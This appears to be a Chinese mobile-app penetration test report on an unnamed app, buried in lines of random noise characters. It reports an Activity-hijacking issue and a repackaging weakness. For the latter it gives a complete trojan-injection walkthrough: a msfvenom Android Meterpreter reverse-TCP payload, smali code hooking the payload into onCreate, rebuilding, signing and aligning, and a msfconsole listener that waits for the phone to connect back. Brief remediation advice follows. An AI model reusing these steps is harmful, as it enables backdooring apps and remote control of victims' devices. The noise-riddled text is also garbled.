9 f" V a7 d$ Q$ u. y3 E1 X1 z3 ]8 K0 v# x; Z, Q; }5 w
5 {) V2 n) E) f* z
% o1 b4 x1 ^" O& M 表1-2 测试结果 4 W5 s0 a D* q- ^2 e
, F7 s0 ~, b7 Y3 ~
9 v0 V3 o1 w( X
/ f7 M8 v) |+ p6 b7 D/ ] , O! p7 E# ~( y+ H) C3 i5 x) X
5 c, ~! `0 x* Z: j6 g, L' P0 e % W6 n: T, L. n/ B+ Q" \ b0 N
6 [; `3 F. T& g3 [
# y6 x: @- T1 l7 U6 u4 e
0 e) ?/ b7 }% b |3 v
7 {0 ~: Y5 L0 v3 P
0 [# X& q; z( t 2 检测结果 8 I: p& H6 T4 Y r; q2 W
8 ~8 p+ o- {0 w0 U( m; ~8 n
( j& Q4 A! ]. V. f' D1 [2 R( v5 O% V) J! |5 a- C
8 ~1 D) ~7 p9 E& U
- M2 q6 H3 H3 `; r% _+ `$ C h 2.1 某某某 0 M6 [0 y& a* _1 L8 f, \; D3 J
. t% ?, v* b8 V% ~7 G
, t% _2 Q- a. x! W
& ~& r5 l: T# j3 U 9 D; }" l: U& |2 D# n0 E3 j: x
% v; B7 c, c/ s' P1 ~
2.1.1检测目标 ' p A- M1 d1 h2 N! g: S; U0 m- z
# m5 d0 g8 J: Z& W2 o" L
9 P. R: _* O' M
! Z- L: L8 L3 s7 b% r5 X
! s" y) V1 b6 u- m& U, v! J, y4 i# f0 O
目标地址: 某某某某某某APP
4 ?! k' l- c2 _7 g; d6 m; x
; l; s0 V) B5 Z( ~* |! `( {8 l# Q
% K) O( Y4 u P4 Z
/ H3 S2 f4 v6 h" n
) P' }" L; {! V4 d: a
1 }5 X& ]: p+ A/ {9 Y. R0 f5 O- l- Q
2.1.2检测结果
% q0 r3 R0 U. L7 R/ t$ |. ~' d r7 X1 ]1 A1 ^# m l" e8 |
' X6 w* f4 I9 V' w& ?# C
2 B4 T2 k0 P' N& Z" k7 d
# Y- ^( p- c7 r/ g6 Y& K4 E- r9 D, Y6 B9 x( P* M* `
2.1.2.1
% y/ w! G# P) X/ g% o7 T; b2 A% {) `3 `/ f) r4 ~2 X4 E5 }/ Q
+ L& O6 U& o' ^9 s
; z2 O' P2 v" N
7 i1 Z3 N' L: [; p9 i' a( E3 V& L) S/ `. U
漏洞链接地址:某某某某某某APP
- e; _& [/ {# S% R" b r! F: S. F5 R
2 s& V' g, i* A( H# U$ |$ J ?% x; s; @$ l3 s# l6 w
g* f" D0 _- L0 X
/ ~2 s, A0 T; s' D G" w0 B# x0 V
: `9 v \3 L3 v7 `+ g8 m
7 ~" s' a6 W% I
6 v& N6 H* u% O, _/ N0 V) W # W% V, v8 O7 ` m
2 X: ~9 h) Z8 z2 p( o
漏洞分析及取证:
$ q( z, k: g5 A9 _8 D6 f0 ]
1 t6 ~: P6 u& w! p+ P
' g; ^) A) f2 G0 q- ]/ M/ U
6 p3 \ {8 W5 h- I. ~7 R( i" m
( Z+ w4 r g- `3 P- R: c& V# h: K5 E2 x1 Z% t5 ^
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
6 l: q% ~) O# u
% V% y3 m, ^$ v7 f8 q) K
: j# I5 ~7 }8 n- Q& F
) a4 ~ c% A* P* a, M
# L( f7 U3 t# Q3 z' I
2 |2 j" {! K* ^& d0 n& C
% D) }' E% H: o+ D, v* r) D" l" P; t. T8 f5 |
2 P/ d9 i4 z" Y
7 A/ H7 S) W4 B1 y s y ) g( @. T4 D; r) u# ]3 i
' l# t/ D& U9 i( d) _
$ b5 t! C8 O1 P" m1 b
2 K4 K% S, u0 r. ]- U" R
! P) {5 s$ K; R% R# G# c9 T% V) p2 H5 j* y4 |. Z/ F% J: P
" J7 r2 y0 l% s6 {3 W4 h. R- Q, S
+ L1 ^8 U5 n; |- N5 y, J3 F3 P7 ` d& |: ^( b7 V
" [1 o* u3 h) @ j( N/ p! T
" C5 X+ A% ^- t& a7 Q4 X& G/ A
. n" D D, t! z8 w" f" m- J
8 \" ?" G) C8 e; [1 I8 C! W
- H( _3 E9 r- A1 b! k/ y, q5 {3 W
# R2 b$ w- A# k/ Q4 z1 R
( y% A: e+ G2 W7 z5 n
/ r' w9 o) ]* R- j0 B
- I7 N3 w ^$ L4 T" _0 X- c$ J. q) }2 V2 |5 m1 f# k
& }" o2 _3 @* y$ s1 z P: J# q
9 X. [3 J4 M3 C" X
h, H( I" V7 x Q7 R
) |; I& M& r5 Q
% B3 E: W3 a6 U: `% B5 G" B' u# T6 k6 B) U: \3 e% v g1 i
漏洞危害:高
: M" s& P m6 E" {0 \, H4 R H8 e5 e( e
6 I* l1 I, s/ c! } K8 Y
4 e$ e) G$ ` } / w7 K5 _3 H& l: A/ P& u, I- G
; {4 Y# B8 r/ V( K. t: {0 O2 }7 t# ]
0 A' Q+ [6 @% m( Z2 E1 \$ j
! ]" ^) |. X' n* |' x) g# N, M6 H) D
& A1 x/ q" i. {* a v! d3 D
' F4 X" w( l0 D1 G9 s+ P
& j3 g8 [: N' }# q l p! {
- L2 G& @1 m! Y- a
| * U- H# v9 ~7 Z6 l- g0 z. q
9 v# o0 D, G. v/ G- @
0 m2 @, ]/ ]3 w9 h1 W4 `, s# X7 Y' a
/ ?8 q* I- }2 J+ \4 U* a: g% G 严重程度
9 V1 g' [, [; j: Z4 v7 H$ F+ l' a& J, `) f. C; F" [8 N6 W2 J
% k: ^* U& I" y3 T* N- o$ q
% U' `; O% [1 u | ! \4 H1 l$ K0 m3 r/ {. g( v5 C
/ r4 B2 H4 F1 q6 |4 q+ e V2 r$ y+ M
% F3 @, r7 w2 g7 R6 ]$ g; M1 U5 z' K1 X
! l$ b {* j( N% g
8 ]) c# m7 F! B$ F6 m0 t
高 - b& r& h% C8 Z
2 \: F1 D+ j! ]
8 ]# N9 Z4 D+ C0 B& R
' y' e* E: ?" \: N9 d0 a | 5 q, u; k3 X) T+ k- S5 a; d
# e9 d1 `7 h: N" ^: w; u' H |0 T 7 z. f2 v% o/ [
, Q; l6 ?% D. W
& c( A* R' ^- h& @2 L* A
6 t/ G. ^* e' s; Q ■
& i4 t7 A6 U& v3 m' k' ?8 H
. N2 ?, F- t# p- a6 w, ]" R
/ d( G) V9 Y! H3 X" D9 c' ]5 G) O I' Z2 r7 G
|
J# w4 \( W% z, R- G5 y
1 z6 d+ ~1 w( M% }& ~ / D- v6 Y( H6 z, z
( s* X2 A; h/ ^# J( ]
2 b O* r) a4 ~2 i0 a R
) I/ L/ K* S. x8 o0 g 中 ! v: ` r+ o7 k: j% }/ S
. d' }2 p; O) j, P
! p3 x6 c0 y" ~- U+ ], _
- J% u' ]6 b- ~- L |
+ _! N) [6 \- M' ^8 J* S
! J+ N- Q/ g/ g; o4 g 5 ^7 G* K0 _* G4 y( ]4 P3 G
) `8 q$ y/ y7 W2 d
8 p4 |- W9 M {/ N+ ~0 d" S- ^$ |! Z( Q1 Y' a, g5 i2 B
0 i6 t1 l$ L/ l9 |) D
% R/ f; n F( r) f9 U" F
' I- i& ^2 r: t7 k4 @
- ?/ ]1 F3 X7 t% e& ~& g: X
| ) Y6 U6 _% ^; B" Q( H. `
, O P: Y$ e% O2 H: i+ b* i
" x5 \0 b( [6 B3 _0 v3 e& k. ^7 h$ u" t
. k$ ~- h9 {" Q: j A2 A5 T$ Y' O2 G% I; P1 q1 _6 |6 A3 B& } Q
低
K4 V% b: L' B9 X" c, @* r1 X) Q
2 M# b3 Z1 X. b+ I# _. v: |
+ d7 B* J& R3 o3 L( B/ X8 _' y7 B! n* W& L
| ' p# O9 o9 I" E
6 |5 j0 z/ x7 h a, [ b
0 M( c. `# ^, {! ?4 K5 }% F e _7 Q( E
) \5 \! |+ H" `; k, u8 {+ f* e7 D0 g- ?2 ~+ @: M
9 ?/ x6 t. V# `/ O2 k% m' }" \0 y
0 ~5 E- P% e _
1 R% j0 H8 }0 Z
| - d& @, h, L7 \& I9 P+ y
' j7 l7 ~8 O/ J* C8 M
+ {' M+ q) d6 |* i# u4 T, ?
. b1 \, a6 O* c# c( l9 R+ Q
9 ]( |% W0 [) ^% E! }5 V: g% g ^5 ~4 |" F
- |! o6 |" w( c2 w, E
- K' \. k3 X+ q3 f; r0 i 8 q' v& b! H+ L* [" R' k3 j
0 v; M4 j/ R! I8 @- I& r# ]( P
* ~9 f% |7 x6 c, s3 |0 Z
9 R8 `- P& C: D4 }( t5 o! S1 q) I$ T $ W. y/ t5 |# m7 g
, r7 x7 V$ q2 ?( J- E
' k+ V( n$ b1 _9 j. ]$ Y& [: }
+ a% P4 Z4 ]! R* Q4 h9 x# G% S+ v * s) Q5 w6 d* B Z
; [' g6 L/ S, p' o [& z5 ]7 ? 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' O& S) k7 S: r9 H8 w3 a; V$ Z
) d- N/ t3 z/ x( Y0 \
% H1 a. g. P3 S
& m5 K* z2 w) Z' w
& Z+ Z8 n3 ~6 y& z+ a
$ `. ~4 `; N: I) k# P! F* G & l f# ?9 O- ]7 n* H2 ], \
5 v1 ^: @7 C0 x* S
0 A7 ?6 z- O7 F7 \1 d7 y, C; I0 N
7 s' B. t8 q4 m
5 z" z# ~; B+ f# R; c
# T4 m+ B" U& d8 ? . t6 Z6 l2 ?8 T% ? a9 q2 T
7 y5 X7 C4 P. D$ ^; H$ o
| _9 p1 v( {1 }5 E
" N7 T, U4 J: f. V
& W; h) v" @# ]! S" G; H! `1 s% W
2.1.2.2
) D! q u9 z. J0 L% B
* U( T u3 T( C+ n$ Y) \, ~. \
, _0 f; v! o! w4 y* ?: l A! }! I; V2 A4 Y7 p, N
: N) H3 |3 h x1 A1 r
, z' x$ V1 \/ |# M+ f3 Y 漏洞链接地址:某某某某某某APP
" `( L6 q, Y. ?
; E4 m0 Q) s9 X6 D+ Z. }8 r
1 f! J- o' i) ^4 E0 O$ {9 Q
) C5 z8 W1 r5 ]0 x ; a8 r' n3 \( J, E1 h/ y
. Z! y2 T* ~4 t) G! { 漏洞分析及取证: 2 G$ G. }7 b$ _0 v9 U
4 H- f/ [- l/ [
& O) ^* m" C; t# y# N
/ B- K* V: m( R* x8 ^5 _ * _4 T% j' a1 j6 j
1 v% R8 v& h& j# [2 E& I3 U% h# N 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: $ {9 z! u, V, o3 S1 S
2 _$ u# ~; M3 ^ i2 v( {3 W* }( t
- L: W: K# w% ?6 Q8 C
2 S: Z. C* k: j. Q+ `0 h, S
% _9 P" @/ b" ^" j
, j/ C9 P) o6 B+ Y' ? 用Metasploit 生成木马 apk
7 ^7 b! ~0 O7 Q9 i" V# q7 H7 ?0 [% i. d4 ~. D0 U
+ w8 K% a/ d q1 P6 l
- ~! J6 h0 X7 P% M) r1 S 1 _/ G% a" Q2 e- y- k$ d( @( ~' U
4 s/ C$ e3 ~+ I3 [5 I msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
4 C4 V0 |7 U/ m6 \
, x1 ~6 W3 e; C
4 @$ ^( } b7 g6 q# J
$ I4 ?( g# l; _( d% P" y p1 O9 f . \% R6 J9 r( D) e# V% T/ k
6 E: B, `* G) F, c- Y, g) L( h 反编译目标apk和木马apk
) A) s- I" P' c9 t1 c
, b3 u$ E2 u' H6 `0 F. P' R% h9 e
) K( f& Q$ a* x6 W g0 L
7 \0 P9 o/ D( y3 P ( f( u j: p# ^
0 d) L. Q5 \7 C, ]/ e3 B9 F apktool d target.apk
9 y! R; q+ E. Z/ c8 ]
% A0 W' s4 B# @( r apktool d cockhorse.apk + g# G" u5 o( n: }
- i/ i' U" s8 |- j! H1 b
( S; {0 a% N( j/ k
: e" G, @/ O+ A$ M- P
+ V8 m) ^0 t4 b: X( D$ @" E. a
2 {1 _5 T8 s$ y: h, P# S( c+ }0 B 木马 apk 注入目标 apk
6 H3 j# h0 j6 m3 ^" D( o9 R B# ~0 [% i: [/ C
' g0 X G( x8 t+ x% q- x1 h
4 J( }$ _ ^7 d" a, p # n, ?+ J! @- d; ]% [/ z
9 X8 b6 L, c7 b7 @/ j
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
2 [! I/ E4 M$ R* d5 g
% m1 }! s9 H6 x3 N' \ X# i3 [
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 8 M. L$ K) W u1 D* O
) G# P$ }2 }% }7 P; j e
0 E2 z$ _( y7 Y/ O* p6 Q6 N
( T; x# L# r' w. A
: Q3 g+ U! S" b z7 |& x) ?$ ]" n
- Y7 J3 D2 t, \* w9 V c 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 " ]0 h5 N& N6 [5 v* e
3 ]1 n. j: A1 _& p2 P* n
% H; |+ S5 p" l( y/ k8 v4 S
' E. E; |! L/ w7 p ( [9 M3 m, R) r: N) u4 ~6 g' P8 |# X s
) I& k. K8 N8 c- c( A3 x8 }, ` 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
* r- P/ B6 w& W+ q
, l+ L$ k# Q- ~* T
) ]. b$ h9 p! t5 `# U
. k7 u( F" v1 U. H
7 s; A5 v. W" a
4 C: y& ~% Z# m1 b 回编译生成最终 apk
3 u* G1 A- ~7 B) |0 U5 ]1 t3 V
" Y- N/ Q: u/ t/ z
3 m( w9 U& `% S0 b4 K) O' B" f, }, B! }) Z+ }2 [ G7 i
' A: u* S9 M8 t5 p
$ m1 ~( }" t0 o) y 重新打包
) ^ [& O g( D; d. v0 V0 x8 Y5 R' e' y" h" k0 |! r* T, ~4 k
! Y$ p0 [# G1 v3 h' T/ T
- X8 z% j l2 C5 @
% f7 C1 g4 e G# |
( N0 F/ {9 Y" v4 ]% I# Q apktool b -o repackage.apk target_app_floder
+ r1 f' W7 |/ `8 [7 L
/ m( Z: h% q F; E
8 x) r) ~5 n$ v5 A9 ?* J
$ R) {7 v( j* Q% j
; y) m* s2 t4 n9 ~2 U2 c# t
! {5 s( s8 [# B$ M3 n" x 创建签名文件,有的话可忽略此步骤 ' T$ q; P! \5 z8 F
; l; E6 N% `: V8 ]- U3 s* D6 M
1 u# K$ t% g6 b3 I, `( V6 h
b( A* }9 D& Q6 m9 E9 T3 B. R# v- r& `8 n
/ J E; E- W+ A- z# C5 D$ V3 K
) Z5 `4 p2 s; P# x& ]4 l: b6 D keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 : D/ h2 G+ e, V1 d; j9 L+ t
l2 K- w* ^( @
# p4 ?4 g2 j/ N: x
, U$ q& G( l: U% a# P
' y O, i4 R2 g/ j# }2 {5 |" g) M7 Z2 `6 H3 Z7 y
签名,以下任选其一 . R! l7 ^/ y& I
- Z' u3 F# M$ L4 Y/ z, p7 b
1 ^8 o1 @. ` W `$ ?$ X
8 H3 E: T) e- \# j
+ w$ t% \; b) M" @0 _; C' _
0 @8 K: P% |8 m" ?! T jarsigner 方式
: F- N7 b! c3 G |# Y. F/ B0 A3 b5 e. a6 I5 K4 _
: d; P9 A+ [4 U/ ?- H
3 h8 u, V# k5 s' s. g/ z
/ u5 F) x, Q s1 X4 L) A, t& h* }+ q: m- A' q! B1 Q; K3 W$ \
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
% a) U1 ^% P2 t! T# @* J# [' q1 }" X {/ V Y
8 w! K! [$ \) z* R) @/ a
2 M, g+ o1 ]' z9 Z# V
0 z& Q* a( c% R8 k9 ]( y) G6 X& @, d0 C/ L) c1 q: N. ~2 ^* o
apksigner 方式 ' \4 S& f: n( ^& s6 J Z
5 K1 r2 j1 |% v5 H
; u5 y) ~0 I9 v( W* R) e% v& _
' e4 ? s9 Z6 s/ A/ K: f0 ]
1 v; ]/ w4 V+ Z4 P ?' _* j1 Y! K
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , Z6 \$ {6 b2 M( K
* t+ n: }" z5 T: V* B) G& ?
) A( ^) _) ^/ ?+ |( N7 k% `; d- @2 Q: F9 `+ Y
& @- F8 O) B/ f% `
. S4 E& x- S( N! a b 如需要禁用 v2签名 添加选项--v2-signing-enabled false * Z- Q: X B6 ]' p+ R3 d, ~! q1 a
$ l9 [4 l& \0 [3 a/ S
0 `0 }# S( O& k5 M& G/ z: b, D, x
8 x5 r2 l! }* i) u( ?; x" {4 P+ {3 M/ l: p
1 q) Z2 \# @, |" t* l( L& e4 } 验证,以下任选其一
+ n; _" j- c# Y7 N* J5 g$ B
^$ Q7 m' T$ Y: L; q1 |
$ @$ _7 r, y( [6 @8 l8 e7 p, p
" ^$ _5 Z3 i8 R, C, M/ E7 h9 W
1 S# }" C1 w2 g' q0 b+ ~! |5 h5 B0 o' K5 {& s _2 | p) J5 ]
jarsigner方式 ' z1 T/ u! w K7 c" [
: r+ Z0 k7 w/ C3 C8 g, n) d
/ J+ A2 [: N X( n
3 A H5 g6 O) l) T. \ : ~$ X* Z6 m: q7 Q4 P8 v1 ]( Z
) J/ ~+ j9 A, N# p7 _; Z jarsigner -verify repackaged.apk ) ]" T$ n& I# g$ [1 w2 m
0 F) \$ r& U9 j* [
. C9 @0 h4 A% `1 w
6 t9 a. e) {3 Q8 I! J
) r7 g( u8 V4 a& Q0 ^+ U8 R6 }. w* A0 j. `+ t p' k
apksigner 方式
& _& p3 k w R% M: f3 W) i7 n j+ V- B! X5 q/ ^
) |" e5 g4 ?$ q+ M; }" I5 W) Q# M3 }( _6 L" `, U i0 }
6 ]2 q7 K1 `2 l3 E+ G$ A' K; {$ a& I |3 R, ~2 U& _" Z
apksigner verify -v --print-certs repackaged.apk
- Z2 k- T0 f% p+ @7 {* o" n$ J; t) y' j% W
0 M0 f( F' S8 O* P
! K# d) Q6 F( F7 B) L& \, N: r' `( V + |! S3 c; F1 k- r7 g
; Q" ?" W+ L7 O% w) r keytool方式 , D/ k1 Z6 I- V8 @2 Z
( H+ N2 \4 a& Q! r3 N( s: J
9 X. U3 H- ^- R6 J) A0 j/ ]7 }8 Y- ]1 T( s$ Q1 Y
1 r3 E9 m3 D1 r( s# C- s" N
! N( T& v d7 T. m
keytool -printcert -jarfile repackaged.apk 5 i4 [4 R' i6 ?1 y4 j M0 T
, ^# B1 H" m) m1 Z
. L1 I, f( a& Z8 R) m" U0 v
/ o1 j2 o+ k' ~# w- X
5 }: ?$ L: l1 X& L& e
( B6 g+ m5 z1 j/ i% b 对齐 - R# Q, l+ A+ ~) p0 a7 V- }
! L# ^$ ~) d* I& m. v( k
4 V! b+ ?8 |/ P- K
3 j. j- Y; A# m8 F+ l4 u
# f1 {, M: g6 `- V/ e/ |
* D X# j. E5 K, D/ ~3 e 字节对齐优化
' N/ J5 z& B y. L0 n$ _: \5 U: l2 s' w; n( T0 t- }: t1 K2 ]
' s2 _$ Z& }! G f2 \" r6 q& J+ @3 p
! U2 ~' x+ [: @6 e% V' U2 z
+ n6 s! h; B9 d- ~
5 |5 r9 ^- S6 R& R7 S zipalign -v 4 repackaged.apk final.apk 6 v7 [& N+ U: a5 o3 B4 U
5 L: T2 o' j6 P4 V# o9 h6 s2 C( Y
% U' X: k5 B& N( g+ E
" D+ B/ D9 G$ j& i9 V$ E* K& k ! q- |# U5 ]0 Y/ I7 \4 c
' _' H+ S+ ]0 J4 a( i 检查是否对齐
5 o; z6 v- V. d3 p2 y* b+ g5 T7 B* k, R. Q6 K4 E
2 o3 @+ h; ]6 k" ?1 m, P' E V8 X7 X3 v% X1 g5 B
1 v& y0 v7 C3 C s2 {' \& l
; a; Z% V" \: T& _+ }3 N1 [ zipalign -c -v 4 final.apk 6 ^3 c( q% @0 \. n$ ~" m
* Y- \" W X5 _+ V+ w
" j8 @5 d1 Z) C7 j3 Y7 C2 A
8 m! `+ P* m' O" \3 w( L+ P" s 3 o3 _1 J1 Z# Z* n
2 Z( T7 R* k" h, o! ?* u3 ]
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 & `1 A1 N9 u% i. o J/ ~. s
4 J' T+ r1 E* Y+ K
( }3 y" o/ K) t- a" D5 c
# o) h. A8 Z* q ! J/ x) k$ }* ^8 V+ t2 I% d
+ e. m# K% i" N4 e
启动Metasploit控制台,配置参数等待上线
; e( q- g% a" \( j3 a# V) ]/ n7 o
R7 z G) k$ o
; `/ H) F9 b5 t1 |% j' u8 b8 ^
$ m* s7 ?+ h8 A3 B: b& g, H% p! u9 e r' r4 f
在终端依次输入如下命令
, [6 e5 L1 A2 d" X0 F0 C4 m: [
6 m D; o: V5 p6 ?9 M' t! w' v
5 o3 D: V" [, l( u% G0 v" P# i0 Z& G. B$ B* N
: q2 S" Y5 } F# d4 P; S
' H6 K8 c# P' T; C. K' q
msfconsole 7 q# c. ]1 q7 @
7 r3 l6 K% c+ s6 x7 B; W, v, y
( \% T! p9 I! F& v
: Z3 @9 f6 N- t% p' d 9 N% V* }5 R u) f/ I5 f
( ~5 d% s* k& Y use exploit/multi/handler
k _% i Z) H6 ~/ ^( m2 h) s0 V
) |. l+ @& Z9 O4 f2 S5 A# V
: `6 _! u) [ q9 N% Z% B
2 \# z; ~3 X% `0 R; W- l V+ j6 G
: [0 h& f R' R1 f
set PAYLOAD android/meterpreter/reverse_tcp . ?0 y& p& h# E+ }. j" v
) y0 t$ }7 Z0 \. U3 n/ S6 H
. g- y( v6 w! B" @+ ]3 _# G# p
6 E' Z0 z5 @8 D8 _+ p8 o . d8 e9 g! Z5 b0 M2 D+ |; s
7 ]4 R9 M( ~- }/ P% g set LHOST 192.xxx.xx.xx $ N6 V8 H3 w! `8 k2 P1 v
9 w/ W: H0 M) x0 r" M" j
" K( v5 M3 P7 b) g x) Y& S. t
/ v" m; Q6 Z9 c- |* Q3 k) J
* C' V. P3 r5 Y/ P* J6 P: {) w2 F I5 N
set LPORT 4444 . H$ J. X8 N, j! T# I
$ @6 L& n9 S; X+ s) E; O( I% N
% D0 x3 b" {6 `$ f) p2 }) m$ Q0 s' s
: X& U* D/ ` Z. a2 D# [# b
: z% Y! r" \# I. k( `7 o( T
0 s; O9 B: I3 g; I8 }
exploit
) T D3 G9 A; e, \3 _' u9 g2 {: R. `( O! _' Q( U' t
4 v# L9 T" u8 `, g, o1 I; S+ Q
6 t4 R/ e& O4 b: _$ {5 M4 [9 V/ N
" Z" M8 k, q% Q# T2 }6 Q* z7 y. t' S9 u6 u, W1 l5 a* u$ o0 H9 M
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
. i. j# h) E6 h* s" N9 a T+ n( B, Y
8 h# Q9 l! L6 X
" w' A/ c( q. I& a! U, y# n
+ i$ R+ C& X2 F6 u8 |+ q
# v: z% V" I0 o% c0 r- [; u
4 n5 w4 U) S8 H. J( ^
漏洞危害:中 # D4 c8 x0 R3 e0 O3 u
' a$ _# @/ ?3 r
) q) Q' W$ i2 _; k) m. T4 L; U3 Q
7 y4 l& f# Z$ r/ O0 F* T& y Q; a2 U9 n, b
, t. P" x9 h& s) K5 ?1 x
) K3 y, _" R' C$ `
3 Z1 C6 g/ b0 @# D: j2 f% Y' V1 l
! x1 s! A6 F. x7 Q7 R5 [
. S' D! Q3 h! B! E, L
: Z5 U* S$ N. _7 @6 D
* y' a' y8 J$ D/ e
2 x2 N4 V: _0 i8 n | $ e4 @3 S% G. |2 c- M1 j# F5 w
8 w, P* N# l* a, r9 i# K! r
' V& r) R4 U4 G4 `9 G. ^6 ~- d1 J) ~, l9 B4 l7 h
严重程度 ! _8 A* x- p; w8 f; B
& `8 ?+ m* q, h0 u+ B& R ^
) t* S- \9 J$ _. t
- J) d$ _* F' U8 l# j" x |
1 V0 l# W% `; B5 [! V& l# `) V
: f: N% ?, @8 ]1 E# w# b, C4 G5 k0 o : S, d# U5 @4 Q7 s' L2 C
D+ ]$ Q, l- K* V- { ; p9 M8 a; a: U1 v. d0 g# N
6 m+ z9 s( [) |0 a7 j4 T
高 9 U9 q8 Q5 k9 g! q& e; J9 H
' ?8 O! T) a' f+ a$ w
) A1 r9 c7 y6 p& _/ h; Y4 i9 P0 O; t' }' H. h
|
& _6 P7 m: v; P1 u
% s2 T$ `. [$ x1 E* ~5 R5 y6 x# u , F {& ?* t' m, }; |2 ]% h) Q
+ l# l# |7 ]& k' X% I9 y$ K
$ Q ~6 n1 U/ V& B8 B
n+ z6 T1 U- h r ■
) @ r7 @, M ~; B- T0 n
2 r6 N; s- h: K+ @# y) I
" K4 p$ X& D, c& o# l1 Q" _5 B6 [" S3 G
|
3 Y7 p9 j+ Y9 ~! k5 l/ U! v( e
9 m- Q% y/ l* B J / G2 r5 F1 Y2 o
' z( g" \! [2 P8 }+ Z8 S4 S4 v 9 e# A* I' ?- P, {+ \: g
. ?" j: T0 G; P" ^. _
中 7 p8 s r$ ]4 O+ g7 t
3 c, P0 B0 k1 y& ^
y7 ?. B. S. G! d6 Y8 w4 l1 Y; X0 K9 s1 P4 F& F& ~
| 1 M- V. @4 P8 i4 n3 s7 z
) O+ `, ~& ?/ O( l% v/ ~5 U . F1 m" q; p0 A3 ~2 m9 m* _
8 H' i0 Y# F8 n( f: x/ n* w
# F; _# w5 l. ?
% _8 `3 u: U8 F0 ~: G: H 8 E: i' m4 M" ?( g2 S- K
: v0 i! m* e3 m( {0 k( o
# B! e! Q( J- s1 G" S' T5 N7 e; U" k
3 Q2 Q# }; f- N K
! N# v2 q; \# w! e0 d, k
: u o% B4 p# u6 Z. f( H: b |
+ M" C" D% C- l4 L, C0 h9 _4 [: t$ p5 z" J+ f
2 d( f8 n4 I# L/ E i3 M+ Q
7 t* ~) M) E7 A8 `; P/ p4 E
8 e/ E- p7 }0 ]- x# s) Z
0 c9 T& S( o9 i% t3 I/ H 低
) q& ?) s) b/ R* V; j3 ^* Y8 {
1 a$ e4 F" j+ ]! d4 s
# i: Q5 K5 n% X5 c8 @3 G6 O* ]4 Q9 w2 Z% D/ p% {- D, X
| ! T$ T# X+ g' e, n$ X
7 z7 X' y) y9 I/ G
. w; F7 B0 n: g! V+ j! v& ^$ a* r( L# u9 R( o
& i& z, W& l, o2 l
* Q& T+ S0 p; |. e/ p$ M
! u) A/ t% @% U1 J; \+ |& ^! k2 v5 T. i; U N7 j! Q5 x# c( L
% O" Z) e- V- N0 x- k7 }5 [
6 T$ c( ?- I( J" t3 N. _
9 P1 `) k& u% r- f; u8 j+ D0 Z, K5 I' v) b3 _; Z4 B1 C [+ L
|
6 ^. w& t6 W0 e! K' D6 N
n7 h$ D% e0 j! F! |1 l3 N1 K( a
3 o7 n4 n0 i/ P
# F) P/ \2 m {3 W+ w 6 G* y1 S& A6 v0 z
5 e9 Q X8 h6 D8 d- ^, D
+ T5 N ^% d; r/ G6 i9 k
7 O, C& E" M2 R
, c9 T+ |% ^+ l f2 a- W f( J, s4 m* v+ n- b. a. S% {; n4 v
" k D" n6 w; |. H
6 @5 |) d" W; V2 P2 _# Q% A
2 D, W! n( f1 G# q- ?
' ~4 A$ a, r9 D* n
9 x. L1 Y8 U, q) x n" Q; B2 @/ b* L: f, f% J2 `+ a) n6 J: F; Y, I# `
$ k* @# O5 E& N7 h) g- V* o
8 }: T' M% d5 ]) M- G 修复方法:
- W0 i ^- j; g. c6 H6 Y& X; I7 [
* N' l3 @ }$ h
; P0 g" o4 y) W' ? X
8 Y4 B' p8 u. q1 ]2 H) Y: B0 \' d 9 i/ \1 x/ t, p2 F1 A1 k
% h- u* W, W1 R% o5 k; {; s 1.在 APP 启动时应做签名校验防止二次打包。
- S" |) Z4 |; R& P6 w0 p
7 U+ x6 o" d) p6 H: ]
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
@9 o/ K( V; c( m Z; ^% P( n5 z. |) A+ ]( v+ w- r- B: \4 [+ n7 p% ~
; x; W* j- R) L) J! Y, \; ^
8 B x1 U" V b; `! N+ @1 ` ; q0 i; w2 S5 |1 ^ J
! t+ S/ H7 e! e- M( Q: Z' g
5 `/ p1 n1 F6 ~& g
. D, E+ x. `0 O& }" H+ O
e* Y. G/ S8 i/ h& E/ a1 k
" [- x* r5 _2 b j/ l6 s$ C0 \
# I: |. m) i: g" E, f% x: Z" q- R0 [3 n6 l1 G" Q
3 b+ _. H: X# z# }% q6 @. `) S& S: d8 S5 N2 y$ j
- c* g3 [5 {# ^) n- m0 ~
) Z1 c& [* Z! E; a! n
5 E# c" W z$ q: U
/ R& Z! r( d' {% w: p
5 l' C* \! X q7 U' }. Z, g& O2 U' P6 k+ a8 ?, [. p